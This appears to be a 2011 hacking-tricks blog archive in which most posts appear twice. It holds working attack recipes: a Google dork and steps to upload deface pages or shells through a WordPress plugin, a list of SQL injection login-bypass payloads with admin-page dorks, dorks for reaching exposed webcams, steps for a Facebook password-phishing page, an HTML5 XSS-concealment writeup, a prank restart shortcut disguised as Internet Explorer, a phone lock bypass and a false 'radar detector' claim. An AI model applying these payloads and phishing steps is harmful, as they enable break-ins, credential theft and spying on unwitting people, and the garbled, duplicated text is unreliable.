Monday 31 October 2011
Thursday 27 October 2011
WordPress Easy Comment Upload Vunerablity :
Google Dork :
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface page ....
and check it here site.com/wp-content/uploads/2011/10/yourfilename.
Note: Different website support different option to upload like txt,jpg, jpeg .
you can also upload your shell in some website .. :-)
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
Open Google and enter the dork Given,
Now select any website
Now select any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface page ....
and check it here site.com/wp-content/uploads/2011/10/yourfilename.
you can also upload your shell in some website .. :-)
Monday 24 October 2011
Shut Down system by double Clicking on Internet Explorer !!!
Double click on Internet explorer to Restart the Computer:
1) Goto Desktop
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:\WINDOWS\system32\shutdown.exe -r -t 00″ without coutes.
4) Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer.
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:\WINDOWS\system32\shutdown.exe -r -t 00″ without coutes.
4) Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer.
6) Now Virus is Ready….. check it out.. when you will double click on Internet Explorer Shortcut… Computer will Restart.
7) This is just a Prank… don’t Misuse it..
How to make a folder with name “con” ?
"CON" is the system keyword and you can't create it using normal method. Just try cmd .
Folder with Name "con"
Goto command Prompt,
Goto the location where you want to make the folder with name “con”.
write the command: mkdir \\.\e:\con
To remove the folder again: rmdir \\.\e:\con
Friday 21 October 2011
Conceal XSS Injection in HTML5
history.pushState() was introduced in HTML5 and it’s meant for modifying history entries.
By using pushState() we’re allowed to alter the visible URL in address bar without reloading the document itself
The Harmful Part : -
The harmful part is that we can conceal the real location and replace it with anything we want. Although the hostname can’t be replaced, we can completely change the pathname.
so, I made a brief PoC about hiding a non-persistent XSS exploit. It’s about executing a malicious script on a login page through a non-validated query parameter (quite common situation). The script redefines form.action and then removes the malicious query parameters of the URL shown in address bar.
Proof of Concept : -
This PoC works only in modern browsers that has implemented this HTML5 proposal. This only works in Google Chrome 9 and Firefox 4 Beta.
pushState() works properly also in Safari 5, but it’s security control refuses to load external scripts or execute injected scripts.
I’ll inject some malicious code via query parameter:
Code:
?username=”>
As you can see the URL is pretty ugly. Therefore shortened it in a trusted URL shortener service (like everyone does nowadays): http://bit.ly/pushStateXSS.
Just visit this URL to see how pushState() behaves and what is shown in address bar.
Conclusion : -
Can this be considered as a security flaw?
Definitely yes.
How it should be fixed? –
There should be a property, eg. history.allowPushState which would be set to false by default. And website developers could explicitly set it to true while being aware of the risks. Edit: I’ve received some feedback about this.
And you’re right – this wouldn’t fix anything since it could be set to true in injection.
By using pushState() we’re allowed to alter the visible URL in address bar without reloading the document itself
The Harmful Part : -
The harmful part is that we can conceal the real location and replace it with anything we want. Although the hostname can’t be replaced, we can completely change the pathname.
so, I made a brief PoC about hiding a non-persistent XSS exploit. It’s about executing a malicious script on a login page through a non-validated query parameter (quite common situation). The script redefines form.action and then removes the malicious query parameters of the URL shown in address bar.
Proof of Concept : -
This PoC works only in modern browsers that has implemented this HTML5 proposal. This only works in Google Chrome 9 and Firefox 4 Beta.
pushState() works properly also in Safari 5, but it’s security control refuses to load external scripts or execute injected scripts.
I’ll inject some malicious code via query parameter:
Code:
?username=”>
As you can see the URL is pretty ugly. Therefore shortened it in a trusted URL shortener service (like everyone does nowadays): http://bit.ly/pushStateXSS.
Just visit this URL to see how pushState() behaves and what is shown in address bar.
Conclusion : -
Can this be considered as a security flaw?
Definitely yes.
How it should be fixed? –
There should be a property, eg. history.allowPushState which would be set to false by default. And website developers could explicitly set it to true while being aware of the risks. Edit: I’ve received some feedback about this.
And you’re right – this wouldn’t fix anything since it could be set to true in injection.
Thursday 20 October 2011
Online SQLI Scanning Website !!
You can use all these website for online SQLI Scanning. For these you will need a Little Knowledge of SQL Injection
http://www.be007.gigfa.com/scanner/scanner.php
http://scanner.drie88.tk/
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
http://wolfscps.com/gscanner.php
http://www.be007.gigfa.com/scanner/scanner.php
http://scanner.drie88.tk/
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
http://wolfscps.com/gscanner.php
How to Hide text behind images ? (Stegonography)
Step 1 Copy an image file to c: of your computer.
Step 2 Copy the text(which you want to hide) to clipboard, by writing it in notepad and selecting it, right clicking it, then copy.
Step 3 Open cmd, by going to Start — All Programs — Accessories — Command Prompt.
Step 4 In cmd type :
cd \
echo “your text to hide” >> “image.jpg”.
Step 5 Now right click on image.jpg — Open with — Notepad. You can see your hidden text at the end of your image file contents.
How to find who is Invisible on Yahoo messenger ?
Sometimes some of your friends who appear offline in yahoo messenger
may not be actually offline, they may in the ‘Invisible’ mode. This
maybe if they are trying to ignore you or are too busy to talk to
anyone.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the
name of the person whom you want to check. The chat window will open
obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this “waiting for your
friend to load Doodle” continuously .See in the picture below:
2. If the user is online (but in invisible mode), after few seconds (it
can take up to one minute, depending on your connection speed), you
should get a blank page like in the picture below. So you know that the
user is online.
How to Reset the Ubuntu Password....
Reset Your Ubuntu Password
Reboot your computer, and then as soon as you see the GRUB Loading
screen, make sure to hit the ESC key so that you can get to the menu.
Root Shell – Easy Method
If you have the option, you can choose the “recovery mode” item on
the menu, usually found right below your default kernel option.
Then choose “Drop to root shell prompt” from this menu.
This should give you a root shell prompt.
Alternate Root Shell Method
If you don’t have the recovery mode option, this is the alternate way
to manually edit the grub options to allow for a root shell.
First you’ll want to make sure to choose the regular boot kernel that
you use (typically just the default one), and then use the “e” key to
choose to edit that boot option.
Now just hit the down arrow key over to the “kernel” option, and then
use the “e” key to switch to edit mode for the kernel option.
You’ll first be presented with a screen where you can find this written “ro single”
You’ll want to remove the “ro single” part with the backspace key, and then add this onto the end:
rw init=/bin/bash
Once you hit enter after adjusting the kernel line, you’ll need to use the B key to choose to boot with that option.
At this point the system should boot up very quickly to a command prompt.
Changing the Actual Password
You can use the following command to reset your password:
passwd <username>
After changing your password, use the following commands to reboot
your system. (The sync command makes sure to write out data to the disk
before rebooting)
sync
reboot –f
I found that the –f parameter was necessary to get the reboot command
to work for some reason. You could always hardware reset instead, but
make sure to use the sync command first.
And now you should be able to login without any issues.
Firefox Shortcut
As we know Mozilla Firefox is very popular amongst all the browsers.
It has lots of shortcut, so here in this post I am going to show you the
shortcuts available in mozilla firefox.
Double-click (On a word) Select the word.
Triple-click Select entire line.
Wheel click Activate the Smooth scrolling
Hold Ctrl + Scroll Wheel forward Increase font size
Hold Ctrl + Scroll Wheel backward Decrease font size
Click one end, hold Shift & click another Create a selection from the two points
F5 Refresh.
F6 Move focus to address bar.
F11 Toggle on/off full-screen mode
Alt + (Left Arrow) Go back on history. Same pas Backspace
Alt + (Right Arrow) Go forward on history.
Ctrl + A Select All.
Ctrl + B Favorites.
Ctrl + C Copy Selected.
Ctrl + D Add the current page to favorite.
Ctrl + E Search panel.
Ctrl + F Find (on page).
Ctrl + H Toggle History panel.
Ctrl + I Toggle Favorites panel.
Ctrl + J Download.
Ctrl + N Open New browser window.
Ctrl + P Print current page / frame.
Ctrl + R Refresh. Same as F5
Ctrl + T New Tab
Esc Stop (while page is loading).
Ctrl + Enter Auto complete a url address
Triple-click Select entire line.
Wheel click Activate the Smooth scrolling
Hold Ctrl + Scroll Wheel forward Increase font size
Hold Ctrl + Scroll Wheel backward Decrease font size
Click one end, hold Shift & click another Create a selection from the two points
F5 Refresh.
F6 Move focus to address bar.
F11 Toggle on/off full-screen mode
Alt + (Left Arrow) Go back on history. Same pas Backspace
Alt + (Right Arrow) Go forward on history.
Ctrl + A Select All.
Ctrl + B Favorites.
Ctrl + C Copy Selected.
Ctrl + D Add the current page to favorite.
Ctrl + E Search panel.
Ctrl + F Find (on page).
Ctrl + H Toggle History panel.
Ctrl + I Toggle Favorites panel.
Ctrl + J Download.
Ctrl + N Open New browser window.
Ctrl + P Print current page / frame.
Ctrl + R Refresh. Same as F5
Ctrl + T New Tab
Esc Stop (while page is loading).
Ctrl + Enter Auto complete a url address
Shift + Enter Complete a .net instead of a .com address.
Ctrl + Shift + Enter Complete a .org address.
Ctrl + Tab Cycle through open tabs.
Ctrl + Shift + Enter Complete a .org address.
Ctrl + Tab Cycle through open tabs.
Branding Windows Xp with your Name and Details...
Open notepad--> copy the lines
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here SAVE it with the name OEMINFO.INI in the c:\windows\system32
Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here SAVE it with the name OEMINFO.INI in the c:\windows\system32
Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here
Chat with Friends through Command Prompt...
All you need is your friend's IP Address and your Command Prompt.
Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
- Now save this as "Messenger.Bat".
- Open Command Prompt.
- Drag this file (.bat file) over to Command Prompt and press Enter.
- Now, type the IP Address of the computer you want to contact and press enter
- Now all you need to do is type your message and press Enter.
Start Chatting.......!
Saturday 15 October 2011
NOKIA Secret Codes
*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own risk, we are not responsible for blocked pones while using these codes!!!
IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country )
FAC = Final Assembly Code: (01,02 = AEG)
(10,20 Nokia)
(40,41,44 Siemens)
(30 Ericsson)
(50 Bosch)
(51 Sony,Siemens,Ericsson)
(60 Alcatel)
(65 AEG)
(70 Sagem)
(75 Dancall)
(80 Philips)
(85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0"
Software Version
*#0000# shows the software version
Signal Processing
*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enchanced full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%
Sim Clock Stopping
*#746025625#
[*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
It will tell you if it can be stopped or not.
Warrenty Menu
*#92702689# takes you to a secret menu with 6 choices:
[*#war0anty#]
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997).
3. Displays (if there) the date where the phone was purchased (MMYY).
4. Displays the date of the last repairment - if found (0000).
5. Makes you capable of transferring user data if you have the gear for it.
6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.
Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#
Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;
The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
1. Enter your menu
2. Select settings
3. Select security settings
4. Select closed user group
5. Select on
6. Enter 00000
7. Press ok
8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.
Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.
IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country )
FAC = Final Assembly Code: (01,02 = AEG)
(10,20 Nokia)
(40,41,44 Siemens)
(30 Ericsson)
(50 Bosch)
(51 Sony,Siemens,Ericsson)
(60 Alcatel)
(65 AEG)
(70 Sagem)
(75 Dancall)
(80 Philips)
(85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0"
Software Version
*#0000# shows the software version
Signal Processing
*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enchanced full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%
Sim Clock Stopping
*#746025625#
[*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
It will tell you if it can be stopped or not.
Warrenty Menu
*#92702689# takes you to a secret menu with 6 choices:
[*#war0anty#]
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997).
3. Displays (if there) the date where the phone was purchased (MMYY).
4. Displays the date of the last repairment - if found (0000).
5. Makes you capable of transferring user data if you have the gear for it.
6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.
Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#
Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;
The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
1. Enter your menu
2. Select settings
3. Select security settings
4. Select closed user group
5. Select on
6. Enter 00000
7. Press ok
8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.
Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.
Skip or bypass Rapidshare, Megaupload Waiting time...
Now you can easily avoid the waiting time or usually we say time limit when you download as a free user from the file sharing services such as rapidshare, megaupload, deposifiles, hotfile. Normally you have to wait for 20-60 minutes to download the second file after downloading the first one. They implement ways to invite users to purchase a premium service. But this way of limiting Free download limit and asking free users to wait for long time to start another download can be annoying one.
Skipscreen is an extension to browser to by pass waiting time on download. Unfortunately it can only be used with Firefox browsers to avoid waiting time while downloading files from some popular File hosting services like:
* Rapidshare.com
* zShare.net
* MediaFire.com
* Megaupload.com
* Sharebee.com
* Depositfiles.com
* Sendspace.com
* Divshare.com
* Linkbucks.com
* Uploaded.to
* Hotfiles.com
* 4shared.com
* Limelinx.com
* Link-Protector.com
Its use is very simple and does not require any configuration, just go to the addon page of the extension and install it, restart your browser and enter one of thesedownload sites and you will no longer have to wait.
Download Skip Screen Firefox Extention
Alternative Methods or Hacks to Beat Rapidshare Download Limits and Waiting Time
2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following.
ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
Note: This might only work for DSL/Modem Internet Connection, not for Cable Internet users
Skipscreen is an extension to browser to by pass waiting time on download. Unfortunately it can only be used with Firefox browsers to avoid waiting time while downloading files from some popular File hosting services like:
* Rapidshare.com
* zShare.net
* MediaFire.com
* Megaupload.com
* Sharebee.com
* Depositfiles.com
* Sendspace.com
* Divshare.com
* Linkbucks.com
* Uploaded.to
* Hotfiles.com
* 4shared.com
* Limelinx.com
* Link-Protector.com
Its use is very simple and does not require any configuration, just go to the addon page of the extension and install it, restart your browser and enter one of thesedownload sites and you will no longer have to wait.
Download Skip Screen Firefox Extention
Alternative Methods or Hacks to Beat Rapidshare Download Limits and Waiting Time
Method 1: Using Java Script:
1. Goto the page you want to download2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
Method 2: Request a new IP address from your ISP server
Here’s how to do it in windows:1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following.
ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
Note: This might only work for DSL/Modem Internet Connection, not for Cable Internet users
Wednesday 12 October 2011
Trojan Removal - A General Process
Trojan Removal - A General Process
If you are using and operating systems such as Windows XP or ME, you MUST disable your System Restore before attempting any removal! After successful removal, you can re-enable System Restore. Here is how to turn off System Restore:
- For Windows ME
Right-click the My Computer icon on the Desktop and click Properties.
Click the Performance tab.
Click the File System button.
Click the Troubleshooting tab.
Select Disable System Restore.
Click Apply > Close > Close.
When prompted to restart, click Yes.
Press F8 while the system restarts.
Choose Safe Mode then hit the Enter key.
After your system has restarted, continue with the scan/clean process. Files under the _Restore folder can now be deleted.
Re-enable System Restore by clearing Disable System Restore and restarting your system normally.
- For Windows XP
Log on as Administrator.
Right-click the My Computer icon on the desktop and click Properties.
Click the System Restore tab.
Select Turn off System Restore.
Click Apply > Yes > OK.
Continue with the scan/clean process. Files under the _Restore folder can now be deleted.
Re-enable System Restore by clearing Turn off System Restore.
Make absolutely sure you have the latest "paid for" versions of removal tools such as Ad-aware and Spybot Search & Destroy.
Reboot your system in "safe mode". Here is how:
- Windows 98/Me
Restart the computer.
Just after the POST diagnostics and memory count, start pressing the F8 key
On the Startup Menu, choose Safe Mode
OR you may use the System Configuration Utility Method.
While in Normal mode, Close all programs.
Click Start, Run and type MSCONFIG in the box and click OK
In the System Configuration Utility, on the General Tab, click the Advanced Button
In the Advanced Troubleshooting Settings dialog box, check Enable Startup Menu. Click OK. Click OK again when the System Configuration Utility reappears.
You will be prompted to restart the computer. Click Yes. The computer will restart in Safe mode.
When you are finished with troubleshooting in Safe mode, open MSCONFIG again and uncheck "Enable Start-up Menu." under the Advanced Menu, then click OK and restart your computer
- Windows 2000
If the computer is running, shut down Windows, and then turn off the power
Wait 30 seconds, and then turn the computer on.
When you see the black-and-white Starting Windows bar at the bottom of the screen, start tapping the F8 key. The Windows 2000 Advanced Options Menu appears.
Ensure that the Safe mode option is selected. In most cases, it is the first item in the list and is selected by default.
Press Enter. The computer then begins to start in Safe mode.
When you are finished with all troubleshooting, close all programs and restart the computer as you normally would.
- Windows XP
If Windows XP is the only operating system installed on your computer, booting into Safe Mode with these instructions.
If the computer is running, shut down Windows, and then turn off the power
Wait 30 seconds, and then turn the computer on.
Start tapping the F8 key. The Windows Advanced Options Menu appears. If you begin tapping the F8 key too soon, some computers display a "keyboard error" message. To resolve this, restart the computer and try again.
Ensure that the Safe mode option is selected.
Press Enter. The computer then begins to start in Safe mode.
When you are finished with all troubleshooting, close all programs and restart the computer as you normally would.
In "safe mode", run Ad-aware, and if still needed, Spybot. If you have the "paid for" versions of these products, make sure you install the "add-ons" they have. For example, Ad-Aware has a special add-on to help remove a very nasty Trojan named VX2 (or Transponder).
Reboot your system in normal mode and rerun Ad-Aware and Spybot. Hopefully you will get a clean report...
Once your get a clean report, use the same System Restore procedure as above, but this time turn System Restore back on.
Tuesday 11 October 2011
How to hack a website using Authentication bypass.
Basic sql injection
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
Monday 10 October 2011
Access the Webcams online using google dorks .
Axis:
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"
Canon:
inurl:sample/LvAppl/
JVC:
intitle:"V.Networks [Motion Picture(Java)"
EvoCam
intitle:"EvoCam" inurl:"webcam.html"
WebcamXP:
intitle:"my webcamXP server!"
MOBOTIX:
inurl:/control/userimage.html
Panasonic:
inurl:/ViewerFrame?Mode=Motion
FlexWatch:
inurl:toolam.html
inurl:viewash.html
Toshiba:
intitle:"TOSHIBA Network Camera - User Login"
Sony:
inurl:/home/homeJ.html
And Some Others
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"
Canon:
inurl:sample/LvAppl/
JVC:
intitle:"V.Networks [Motion Picture(Java)"
EvoCam
intitle:"EvoCam" inurl:"webcam.html"
WebcamXP:
intitle:"my webcamXP server!"
MOBOTIX:
inurl:/control/userimage.html
Panasonic:
inurl:/ViewerFrame?Mode=Motion
FlexWatch:
inurl:toolam.html
inurl:viewash.html
Toshiba:
intitle:"TOSHIBA Network Camera - User Login"
Sony:
inurl:/home/homeJ.html
And Some Others
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
How to download books from Google books for Free?
Step 1:
Download/install Greasemonkey addon(Customize the way a web page displays or behaves, by using small bits of JavaScript.) in Firefox
Install this userscript :google book download
Download/insall the Flashgot (FlashGot is the free add-on for Firefox and Thunderbird, meant to handle single and massive ("all" and "selection") downloads with several external Download Managers. )
Download/install Flashget(Download Manager)
Step 2:
View your favorite book.
For Example: http://books.google.com/books?id=Tmy8LAaVka8C&printsec=frontcover
In the left panel, click Download this book
Select all pages, right-click, choose FlashGot Selection
Press OK to start downloading. Note : Download only one page at a time, or your IP will be banned
After the downloading is finished, in FlashGet, left panel, choose Downloaded folder.
Select all pages of the book, right-click, choose Rename -> Comment As Filename
Read book
Download/install Greasemonkey addon(Customize the way a web page displays or behaves, by using small bits of JavaScript.) in Firefox
Install this userscript :google book download
Download/insall the Flashgot (FlashGot is the free add-on for Firefox and Thunderbird, meant to handle single and massive ("all" and "selection") downloads with several external Download Managers. )
Download/install Flashget(Download Manager)
Step 2:
View your favorite book.
For Example: http://books.google.com/books?id=Tmy8LAaVka8C&printsec=frontcover
In the left panel, click Download this book
Select all pages, right-click, choose FlashGot Selection
Press OK to start downloading. Note : Download only one page at a time, or your IP will be banned
After the downloading is finished, in FlashGet, left panel, choose Downloaded folder.
Select all pages of the book, right-click, choose Rename -> Comment As Filename
Read book
How to Hack Facebook Account Using Phishing webPage
Phishing WebPage:
Creating web page which look like any site is described as Phishing. By creating Phishing Web Page, you can make users to believe that it is original website and enter their id and password.
Step 1:
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
The big red ring that circles the action= you have to change. You have to change it to 'action="a.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3:
Now we need to create the "a.php" to store the password. so open the notepad and type the following code:
save this file as "a.php"
Step 4:
open the notepad and just save the file as "passwd.txt" without any contents.
Now upload those three files(namely index.html,a.php,passwd.txt) in any of Free Web hosting site.
For: Example:
*http://110mb.com/
*http://ripway.com/
